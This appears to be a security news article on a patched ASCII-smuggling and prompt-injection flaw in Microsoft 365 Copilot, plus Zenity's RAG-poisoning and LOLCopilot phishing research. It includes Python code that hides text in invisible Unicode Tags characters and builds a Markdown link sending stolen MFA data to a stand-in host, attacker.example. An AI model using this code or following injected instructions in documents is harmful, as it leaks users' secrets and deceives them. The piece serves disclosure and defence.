Details have emerged about a now-patched vulnerability in Microsoft 365 Copilot that could enable the theft of sensitive user information using a technique called ASCII smuggling.
"ASCII Smuggling is a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface," security researcher Johann Rehberger said.
"This means that an attacker can have the [large language model] render, to the user, invisible data, and embed them within clickable hyperlinks. This technique basically stages the data for exfiltration!"
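The invisibility comes from the Unicode Tags block (U+E0000–U+E007F), which mirrors ASCII code point for code point but renders as zero-width in most user interfaces. A minimal Python sketch of the encoding, assuming the hidden payload is plain ASCII:

```python
# ASCII smuggling sketch: map each ASCII character into the Unicode
# Tags block (U+E0000-U+E007F), which most UIs render as invisible,
# and reverse the mapping to recover the hidden text.
TAG_BASE = 0xE0000

def smuggle(text: str) -> str:
    """Encode ASCII as invisible Unicode Tags characters."""
    return "".join(chr(TAG_BASE + ord(c)) for c in text if ord(c) < 0x80)

def unsmuggle(mixed: str) -> str:
    """Recover ASCII from Tags-block characters, ignoring visible text."""
    return "".join(
        chr(ord(c) - TAG_BASE)
        for c in mixed
        if TAG_BASE <= ord(c) <= TAG_BASE + 0x7F
    )

secret = "MFA code: 123456"
encoded = smuggle(secret)
# The encoded string has the same length but displays as nothing in
# most interfaces, yet survives copy/paste and round-trips cleanly.
assert unsmuggle("visible text" + encoded) == secret
```

Scanning input and output for Tags-block code points, as `unsmuggle` does, is also the basis of a simple defensive filter.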
The attack chains together a number of methods into a reliable exploit, comprising the following steps -
- Triggering prompt injection via malicious content concealed in a document shared in the chat to seize control of the chatbot
- Using a prompt injection payload to instruct Copilot to search for more emails and documents, a technique called automatic tool invocation
- Leveraging ASCII smuggling to entice the user into clicking on a link to exfiltrate valuable data to a third-party server
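To illustrate the final staging step, the link rendered by the chatbot can look benign while carrying the stolen data both invisibly in its display text and as a query parameter in its URL. A hypothetical sketch (the `attacker.example` domain and parameter name are placeholders, not details from the disclosed exploit):

```python
from urllib.parse import quote

TAG_BASE = 0xE0000  # base of the Unicode Tags block, mirrors ASCII

def smuggle(text: str) -> str:
    # Encode ASCII as invisible Unicode Tags characters.
    return "".join(chr(TAG_BASE + ord(c)) for c in text if ord(c) < 0x80)

# Hypothetical exfiltration link: the visible label hides the stolen
# data as invisible characters, and the URL carries it to the
# attacker-controlled server as a query parameter once clicked.
stolen = "MFA=482913"
link_text = "Click here to verify" + smuggle(stolen)
url = "https://attacker.example/c?d=" + quote(stolen)
markdown_link = f"[{link_text}]({url})"
print(markdown_link)  # renders as an innocuous "Click here to verify" link
```

When a chat interface renders such Markdown, the user sees only the visible label, which is what makes the click lure effective.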
The net outcome of the attack is that sensitive data present in emails, including multi-factor authentication (MFA) codes, could be transmitted to an adversary-controlled server. Microsoft has since addressed the issues following responsible disclosure in January 2024.
The development comes as proof-of-concept (PoC) attacks have been demonstrated against Microsoft's Copilot system to manipulate responses, exfiltrate private data, and dodge security protections, once again highlighting the need for monitoring risks in artificial intelligence (AI) tools.
The methods, detailed by Zenity, allow malicious actors to perform retrieval-augmented generation (RAG) poisoning and indirect prompt injection leading to remote code execution attacks that can fully control Microsoft Copilot and other AI apps. In a hypothetical attack scenario, an external hacker with code execution capabilities could trick Copilot into providing users with phishing pages.
Perhaps one of the most novel attacks is the ability to turn the AI into a spear-phishing machine. The red-teaming technique, dubbed LOLCopilot, allows an attacker with access to a victim's email account to send phishing messages that mimic the compromised user's style.
Microsoft has also acknowledged that publicly exposed Copilot bots created using Microsoft Copilot Studio and lacking any authentication protections could be an avenue for threat actors to extract sensitive information, assuming they have prior knowledge of the Copilot name or URL.
"Enterprises should evaluate their risk tolerance and exposure to prevent data leaks from Copilots (formerly Power Virtual Agents), and enable Data Loss Prevention and other security controls accordingly to control creation and publication of Copilots," Rehberger said.